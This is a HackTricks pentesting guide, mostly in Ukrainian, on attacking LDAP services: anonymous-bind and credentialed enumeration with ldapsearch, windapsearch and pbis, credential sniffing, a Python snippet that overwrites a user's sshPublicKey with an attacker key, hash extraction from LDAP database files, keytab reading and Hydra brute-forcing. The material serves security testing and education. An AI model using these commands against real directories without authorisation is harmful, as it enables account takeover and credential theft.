hacktricks/network-services-pentesting/pentesting-ldap.md

21 KiB
Raw Blame History

389, 636, 3268, 3269 - Pentesting LDAP

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Використання LDAP (Протокол легкого доступу до каталогів) в основному призначене для знаходження різних сутностей, таких як організації, особи та ресурси, такі як файли та пристрої в мережах, як публічних, так і приватних. Він пропонує спрощений підхід у порівнянні зі своїм попередником, DAP, завдяки меншому обсягу коду.

Каталоги LDAP структуровані так, щоб дозволити їх розподіл на кількох серверах, при цьому кожен сервер містить репліковану та синхронізовану версію каталогу, що називається Агентом системи каталогів (DSA). Відповідальність за обробку запитів повністю лежить на сервері LDAP, який може спілкуватися з іншими DSA за потреби, щоб надати єдину відповідь запитувачу.

Організація каталогу LDAP нагадує деревоподібну ієрархію, починаючи з кореневого каталогу вгорі. Це розгалужується на країни, які далі діляться на організації, а потім на організаційні одиниці, що представляють різні підрозділи або департаменти, нарешті досягаючи рівня окремих сутностей, включаючи як людей, так і спільні ресурси, такі як файли та принтери.

Порт за замовчуванням: 389 та 636(ldaps). Глобальний каталог (LDAP в ActiveDirectory) доступний за замовчуванням на портах 3268 та 3269 для LDAPS.

PORT    STATE SERVICE REASON
389/tcp open  ldap    syn-ack
636/tcp open  tcpwrapped

LDAP Data Interchange Format

LDIF (LDAP Data Interchange Format) визначає вміст каталогу як набір записів. Він також може представляти запити на оновлення (Додати, Змінити, Видалити, Перейменувати).

dn: dc=local
dc: local
objectClass: dcObject

dn: dc=moneycorp,dc=local
dc: moneycorp
objectClass: dcObject
objectClass: organization

dn ou=it,dc=moneycorp,dc=local
objectClass: organizationalUnit
ou: dev

dn: ou=marketing,dc=moneycorp,dc=local
objectClass: organizationalUnit
Ou: sales

dn: cn= ,ou= ,dc=moneycorp,dc=local
objectClass: personalData
cn:
sn:
gn:
uid:
ou:
mail: pepe@hacktricks.xyz
phone: 23627387495
  • Рядки 1-3 визначають домен верхнього рівня local
  • Рядки 5-8 визначають домен першого рівня moneycorp (moneycorp.local)
  • Рядки 10-16 визначають 2 організаційні одиниці: dev та sales
  • Рядки 18-26 створюють об'єкт домену та призначають атрибути з значеннями

Запис даних

Зверніть увагу, що якщо ви можете змінювати значення, ви можете виконувати дійсно цікаві дії. Наприклад, уявіть, що ви можете змінити інформацію "sshPublicKey" вашого користувача або будь-якого користувача. Існує висока ймовірність, що якщо цей атрибут існує, то ssh читає публічні ключі з LDAP. Якщо ви можете змінити публічний ключ користувача, ви зможете увійти як цей користувач, навіть якщо аутентифікація за паролем не ввімкнена в ssh.

# Example from https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/
>>> import ldap3
>>> server = ldap3.Server('x.x.x.x', port =636, use_ssl = True)
>>> connection = ldap3.Connection(server, 'uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN', 'PASSWORD', auto_bind=True)
>>> connection.bind()
True
>>> connection.extend.standard.who_am_i()
u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN'
>>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]})

Sniff clear text credentials

Якщо LDAP використовується без SSL, ви можете sniff credentials in plain text в мережі.

Також ви можете виконати MITM атаку в мережі між LDAP сервером і клієнтом. Тут ви можете здійснити Downgrade Attack, щоб клієнт використовував credentials in clear text для входу.

Якщо SSL використовується, ви можете спробувати зробити MITM, як згадувалося вище, але запропонувавши false certificate, якщо користувач його прийме, ви зможете знизити метод аутентифікації і знову побачити облікові дані.

Anonymous Access

Bypass TLS SNI check

Згідно з this writeup, просто отримавши доступ до LDAP сервера з довільним доменним ім'ям (наприклад, company.com), він зміг зв'язатися з LDAP сервісом і витягти інформацію як анонімний користувач:

ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" +

LDAP анонімні зв'язки

LDAP анонімні зв'язки дозволяють неавтентифікованим атакам отримувати інформацію з домену, таку як повний список користувачів, груп, комп'ютерів, атрибутів облікових записів користувачів та політики паролів домену. Це старе налаштування, і починаючи з Windows Server 2003, лише автентифіковані користувачі можуть ініціювати LDAP запити.
Однак адміністратори могли налаштувати конкретний додаток для дозволу анонімних зв'язків і надати більше доступу, ніж планувалося, тим самим надаючи неавтентифікованим користувачам доступ до всіх об'єктів в AD.

Дійсні облікові дані

Якщо у вас є дійсні облікові дані для входу на LDAP сервер, ви можете вивантажити всю інформацію про Domain Admin, використовуючи:

ldapdomaindump

pip3 install ldapdomaindump
ldapdomaindump <IP> [-r <IP>] -u '<domain>\<username>' -p '<password>' [--authtype SIMPLE] --no-json --no-grep [-o /path/dir]

Brute Force

Enumeration

Automated

Використовуючи це, ви зможете побачити публічну інформацію (таку як ім'я домену):

nmap -n -sV --script "ldap* and not brute" <IP> #Using anonymous credentials

Python

Переглянути LDAP-енумерацію з python

Ви можете спробувати перерахувати LDAP з або без облікових даних, використовуючи python: pip3 install ldap3

Спочатку спробуйте підключитися без облікових даних:

>>> import ldap3
>>> server = ldap3.Server('x.X.x.X', get_info = ldap3.ALL, port =636, use_ssl = True)
>>> connection = ldap3.Connection(server)
>>> connection.bind()
True
>>> server.info

Якщо відповідь True, як у попередньому прикладі, ви можете отримати деякі цікаві дані з LDAP (як-от контекст іменування або ім'я домену) з:

>>> server.info
DSA info (from DSE):
Supported LDAP versions: 3
Naming contexts:
dc=DOMAIN,dc=DOMAIN

Якщо у вас є контекст імен, ви можете виконати деякі більш цікаві запити. Цей простий запит має показати вам усі об'єкти в каталозі:

>>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*')
True
>> connection.entries

Або вивантажити весь ldap:

>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=person))', search_scope='SUBTREE', attributes='userPassword')
True
>>> connection.entries

windapsearch

Windapsearch - це скрипт на Python, корисний для перерахунку користувачів, груп та комп'ютерів з домену Windows за допомогою LDAP запитів.

# Get computers
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --computers
# Get groups
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --groups
# Get users
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
# Get Domain Admins
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
# Get Privileged Users
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --privileged-users

ldapsearch

Перевірте нульові облікові дані або чи є ваші облікові дані дійсними:

ldapsearch -x -H ldap://<IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
# CREDENTIALS NOT VALID RESPONSE
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v3839

Якщо ви знайдете щось, що говорить, що "bind must be completed" означає, що облікові дані неправильні.

Ви можете витягти все з домену за допомогою:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
-x Simple Authentication
-H LDAP Server
-D My User
-w My password
-b Base site, all data from here will be given

Витягти користувачів:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
#Example: ldapsearch -x -H ldap://<IP> -D 'MYDOM\john' -w 'johnpassw' -b "CN=Users,DC=mydom,DC=local"

Витягти комп'ютери:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TLD>"

Витягніть мою інформацію:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=<MY NAME>,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"

Витягти Domain Admins:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"

Витягти Користувачів Домену:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"

Витягти Enterprise Admins:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"

Витягти Адміністратори:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"

Витягти Remote Desktop Group:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"

Щоб перевірити, чи маєте ви доступ до будь-якого пароля, ви можете використовувати grep після виконання одного з запитів:

<ldapsearchcmd...> | grep -i -A2 -B2 "userpas"

Будь ласка, зверніть увагу, що паролі, які ви можете знайти тут, можуть бути не справжніми...

pbis

Ви можете завантажити pbis звідси: https://github.com/BeyondTrust/pbis-open/ і зазвичай він встановлюється в /opt/pbis.
Pbis дозволяє вам легко отримувати основну інформацію:

#Read keytab file
./klist -k /etc/krb5.keytab

#Get known domains info
./get-status
./lsa get-status

#Get basic metrics
./get-metrics
./lsa get-metrics

#Get users
./enum-users
./lsa enum-users

#Get groups
./enum-groups
./lsa enum-groups

#Get all kind of objects
./enum-objects
./lsa enum-objects

#Get groups of a user
./list-groups-for-user <username>
./lsa list-groups-for-user <username>
#Get groups of each user
./enum-users | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done

#Get users of a group
./enum-members --by-name "domain admins"
./lsa enum-members --by-name "domain admins"
#Get users of each group
./enum-groups | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done

#Get description of each user
./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n <Username> | grep "CN" | while read line; do
echo "$line";
./adtool --keytab=/etc/krb5.keytab -n <username> -a lookup-object --dn="$line" --attr "description";
echo "======================"
done

Графічний інтерфейс

Apache Directory

Завантажте Apache Directory звідси. Ви можете знайти приклад використання цього інструменту тут.

jxplorer

Ви можете завантажити графічний інтерфейс з LDAP сервером тут: http://www.jxplorer.org/downloads/users.html

За замовчуванням він встановлюється в: /opt/jxplorer

Godap

Ви можете отримати доступ до нього за адресою https://github.com/Macmod/godap

Аутентифікація через kerberos

Використовуючи ldapsearch, ви можете аутентифікуватися через kerberos замість NTLM, використовуючи параметр -Y GSSAPI

POST

Якщо ви можете отримати доступ до файлів, де містяться бази даних (може бути в /var/lib/ldap). Ви можете витягти хеші, використовуючи:

cat /var/lib/ldap/*.bdb | grep -i -a -E -o "description.*" | sort | uniq -u

Ви можете ввести john хеш пароля (з '{SSHA}' до 'structural' без додавання 'structural').

Конфігураційні файли

  • Загальні
  • containers.ldif
  • ldap.cfg
  • ldap.conf
  • ldap.xml
  • ldap-config.xml
  • ldap-realm.xml
  • slapd.conf
  • IBM SecureWay V3 сервер
  • V3.sas.oc
  • Microsoft Active Directory сервер
  • msadClassesAttrs.ldif
  • Netscape Directory Server 4
  • nsslapd.sas_at.conf
  • nsslapd.sas_oc.conf
  • OpenLDAP directory server
  • slapd.sas_at.conf
  • slapd.sas_oc.conf
  • Sun ONE Directory Server 5.1
  • 75sas.ldif

HackTricks Автоматичні команди

Protocol_Name: LDAP    #Protocol Abbreviation if there is one.
Port_Number:  389,636     #Comma separated if there is more than one.
Protocol_Description: Lightweight Directory Access Protocol         #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for LDAP
Note: |
The use of LDAP (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint.

https://book.hacktricks.xyz/pentesting/pentesting-ldap

Entry_2:
Name: Banner Grab
Description: Grab LDAP Banner
Command: nmap -p 389 --script ldap-search -Pn {IP}

Entry_3:
Name: LdapSearch
Description: Base LdapSearch
Command: ldapsearch -H ldap://{IP} -x

Entry_4:
Name: LdapSearch Naming Context Dump
Description: Attempt to get LDAP Naming Context
Command: ldapsearch -H ldap://{IP} -x -s base namingcontexts

Entry_5:
Name: LdapSearch Big Dump
Description: Need Naming Context to do big dump
Command: ldapsearch -H ldap://{IP} -x -b "{Naming_Context}"

Entry_6:
Name: Hydra Brute Force
Description: Need User
Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f

{% hint style="success" %} Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Підтримайте HackTricks
{% endhint %}